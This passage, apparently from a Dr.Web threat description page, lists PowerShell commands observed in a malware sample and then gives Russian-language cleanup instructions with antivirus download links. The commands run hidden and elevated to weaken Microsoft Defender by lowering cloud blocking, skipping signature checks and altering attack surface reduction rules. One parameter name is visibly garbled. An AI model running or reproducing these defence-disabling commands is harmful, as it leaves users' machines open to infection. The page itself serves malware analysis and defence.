  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -CloudBlockLevel 0 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -CheckForSignaturesBeforeself.box_boxningScan 0' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids c1db55ab-c21a-4637-bb3f-a12568109d35 -AttackSurfaceReductionRules_...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d1e49aac-8f56-4280-b9ba-993a6d77406c -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableLowCpuPriority 0 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanParameters 1

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Скачать Dr.Web с Apple Store

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке

Скачать с сайта
Скачать с Google Play